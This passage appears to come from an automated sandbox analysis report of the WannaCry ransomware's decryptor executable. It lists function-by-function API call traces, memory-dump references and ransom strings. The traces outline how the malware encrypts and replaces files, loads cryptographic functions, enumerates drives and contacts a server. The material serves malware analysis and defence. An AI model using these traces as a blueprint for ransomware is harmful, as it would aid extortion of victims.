    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
    • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
    • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
    • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
    • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004032C0, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114
    APIs
    • #4710.MFC42 ref: 004032C5
    • CreateSolidBrush.GDI32(?), ref: 004032DC
    • #1641.MFC42(00000000), ref: 004032E9
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
    • #1641.MFC42(00000000), ref: 0040331F
    • #3092.MFC42(00000408,00000000), ref: 0040332B
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
    • #3092.MFC42(00000409), ref: 00403353
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
    • #3092.MFC42(00000002), ref: 00403372
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
    • #3092.MFC42(0000040E), ref: 00403394
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
      • Part of subcall function 00403CB0: FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
      • Part of subcall function 00403CB0: sscanf.MSVCRT ref: 00403D26
      • Part of subcall function 00403CB0: fopen.MSVCRT ref: 00403D45
      • Part of subcall function 00403CB0: fread.MSVCRT ref: 00403D69
      • Part of subcall function 00403CB0: sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
      • Part of subcall function 00403CB0: #823.MFC42(00000088), ref: 00403DE4
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
      • Part of subcall function 00403CB0: fclose.MSVCRT ref: 00403E16
      • Part of subcall function 00403CB0: FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
      • Part of subcall function 00403CB0: FindClose.KERNEL32(?), ref: 00403E3B
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
    • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
    • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406AE0, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78
    APIs
    • #540.MFC42(?,767AAD28), ref: 00406B03
    • #3874.MFC42 ref: 00406B1B
    • #537.MFC42(msg\), ref: 00406B29
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
    • sprintf.MSVCRT ref: 00406B59
    • #800.MFC42(?,?,767AAD28), ref: 00406B62
    • #800.MFC42 ref: 00406B73
    • GetFileAttributesA.KERNEL32(?), ref: 00406B7D
    • #537.MFC42(msg\), ref: 00406B91
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
    • sprintf.MSVCRT ref: 00406BBB
    • #800.MFC42(?,?,?,?,?,767AAD28), ref: 00406BC4
    • #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406CF0: SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
      • Part of subcall function 00406CF0: #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767AAD28), ref: 00406D39
      • Part of subcall function 00406CF0: SendMessageA.USER32 ref: 00406D69
      • Part of subcall function 00406CF0: #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406CF0: #665.MFC42 ref: 00406D87
    • #800.MFC42(?), ref: 00406BF5
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00402C40, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72
    APIs
      • Part of subcall function 00404B70: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00405580, Relevance: 27.2, APIs: 18, Instructions: 187
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00408D70, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401600, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120
    APIs
    • #537.MFC42(Received response), ref: 00401634
    • #2385.MFC42 ref: 00401653
    • #537.MFC42(Succeed), ref: 0040166F
    • #2385.MFC42(?,?,?,Succeed), ref: 00401684
    • #537.MFC42(Sent request), ref: 0040169F
    • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
    • #2385.MFC42 ref: 004016D3
    • #537.MFC42(Connected), ref: 004016F5
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
    • #2385.MFC42 ref: 00401729
    • #2385.MFC42(?,?,?), ref: 0040174C
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404DD0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89
    APIs
    • #4710.MFC42 ref: 00404DD5
    • CreateSolidBrush.GDI32(?), ref: 00404DE9
    • #1641.MFC42(00000000), ref: 00404DF3
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
    • #1641.MFC42(00000000), ref: 00404E26
    • #3092.MFC42(00000403,00000000), ref: 00404E32
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
    • #3092.MFC42(00000001), ref: 00404E57
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
    • #3092.MFC42(00000002), ref: 00404E76
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00411CF0, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450
    APIs
      • Part of subcall function 00410A50: SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
      • Part of subcall function 00410A50: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
    • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00410AF0: ReadFile.KERNEL32(000000FF,00000404,ZA,00000404,00000000), ref: 00410B18
    • #825.MFC42(00000000), ref: 00411E84
    • _mbsstr.MSVCRT ref: 00411F04
    • _mbsstr.MSVCRT ref: 00411F1B
    • _mbsstr.MSVCRT ref: 00411F32
    • _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411B80: SystemTimeToFileTime.KERNEL32(?,?), ref: 00411BE6
    • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
    • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040BAF0, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 301
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • strtok.MSVCRT ref: 0040BBA9
      • Part of subcall function 0040C7B0: #825.MFC42(?,00000000,0040BBD1,00000000,00000000,00000000), ref: 0040C7D7
      • Part of subcall function 0040C920: ?_Xlen@std@@YAXXZ.MSVCP60(00000001,?,0040BBE8,00000000,?,00000000,00000000,00000000), ref: 0040C92D
      • Part of subcall function 0040C800: #823.MFC42(00000018,00000000,00000000,00000001,?,0040BC08), ref: 0040C80F
    • strtok.MSVCRT ref: 0040BC22
    • #825.MFC42(?,?), ref: 0040BCDD
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040BCEC
    • srand.MSVCRT ref: 0040BCF3
    • rand.MSVCRT ref: 0040BD09
      • Part of subcall function 0040CE50: #825.MFC42(?,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE6F
      • Part of subcall function 0040CE50: #825.MFC42(00000008,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE95
    • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8A3
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
    • #825.MFC42(?,?,?,?), ref: 0040BDED
    • #825.MFC42(?), ref: 0040BE7A
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C776
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C794
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406DC0, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103
    APIs
    • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
    • #823.MFC42(00000001,?,?), ref: 00406DEC
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
    • _strnicmp.MSVCRT ref: 00406E3E
    • _strnicmp.MSVCRT ref: 00406E5A
    • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
    • #6136.MFC42 ref: 00406EC4
    • #825.MFC42(?), ref: 00406ED7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00402560, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81
    APIs
    • wcscpy.MSVCRT ref: 0040257D
    • wcsrchr.MSVCRT ref: 0040258A
    • _wcsicmp.MSVCRT ref: 004025A5
    • _wcsicmp.MSVCRT ref: 004025B4
    • wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 004020A0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
      • Part of subcall function 004020A0: GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
      • Part of subcall function 004020A0: CloseHandle.KERNEL32(00000000), ref: 00402234
      • Part of subcall function 004020A0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
      • Part of subcall function 004020A0: SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
      • Part of subcall function 004020A0: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040230F
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00100000,?,00000000), ref: 004023F3
      • Part of subcall function 004020A0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00402436
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402452
      • Part of subcall function 004020A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
      • Part of subcall function 004020A0: SetEndOfFile.KERNEL32(00000000), ref: 00402491
      • Part of subcall function 004020A0: SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
      • Part of subcall function 004020A0: CloseHandle.KERNEL32(00000000), ref: 004024BD
      • Part of subcall function 004020A0: MoveFileW.KERNEL32(?,?), ref: 004024DA
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402511
    • DeleteFileW.KERNEL32(?), ref: 004025F0
    • MoveFileW.KERNEL32(?,?), ref: 00402604
    • DeleteFileW.KERNEL32(?), ref: 0040262E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040C240, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 195
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
      • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
    • fopen.MSVCRT ref: 0040C46B
    • fwrite.MSVCRT ref: 0040C489
    • fclose.MSVCRT ref: 0040C48F
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00413102, Relevance: 16.6, APIs: 11, Instructions: 111
    APIs
    • __set_app_type.MSVCRT ref: 0041312F
    • __p__fmode.MSVCRT ref: 00413144
    • __p__commode.MSVCRT ref: 00413152
    • __setusermatherr.MSVCRT ref: 0041317E
      • Part of subcall function 004133B2: _controlfp.MSVCRT ref: 004133BC
    • _initterm.MSVCRT ref: 00413194
    • __getmainargs.MSVCRT ref: 004131B7
    • _initterm.MSVCRT ref: 004131C7
    • GetStartupInfoA.KERNEL32(?), ref: 00413206
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041322A
      • Part of subcall function 004133E6: #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    • exit.MSVCRT ref: 0041323A
    • _XcptFilter.MSVCRT ref: 0041324C
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401C70, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114
    APIs
    • wcscat.MSVCRT ref: 00401CC1
    • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
    • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
    • RegQueryValueExA.ADVAPI32 ref: 00401D81
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
    • RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404280, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51
    APIs
    • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
    • GetParent.USER32(?), ref: 004042BB
    • #2864.MFC42(00000000), ref: 004042C2
    • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
    • #2379.MFC42 ref: 004042DD
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
    • #2379.MFC42(?), ref: 004042FF
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004038F0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
    APIs
      • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
      • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
      • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
      • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
      • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
      • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
    • sprintf.MSVCRT ref: 0040397A
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
      • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
      • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
      • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
    • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
      • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00403AF0: fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00403AF0: fclose.MSVCRT ref: 00403C62
    • CloseHandle.KERNEL32(?), ref: 004039F1
    Strings
    • All your files have been decrypted!, xrefs: 004039C3
    • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
    • %08X.dky, xrefs: 00403969
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
